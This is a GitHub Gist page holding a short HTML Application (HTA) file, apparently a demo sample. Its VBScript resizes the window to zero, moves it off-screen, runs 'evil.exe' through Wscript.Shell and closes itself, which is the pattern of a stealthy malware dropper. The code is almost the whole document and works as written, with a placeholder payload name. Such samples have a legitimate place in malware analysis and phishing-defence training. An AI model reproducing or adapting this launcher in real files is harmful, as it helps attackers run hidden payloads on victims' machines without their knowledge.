Last active
December 13, 2019 07:29
-
-
Save fareedfauzi/f3276596a0ef6b606457ddf799a44dfa to your computer and use it in GitHub Desktop.
HTA file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<HTML> | |
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"> | |
<HEAD> | |
<script language="VBScript"> | |
Window.ReSizeTo 0, 0 | |
Window.moveTo -2000,-2000 | |
Set objShell = CreateObject("Wscript.Shell") | |
objShell.Run "evil.exe" | |
self.close | |
</script> | |
<body> | |
demo | |
</body> | |
</HEAD> | |
</HTML> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment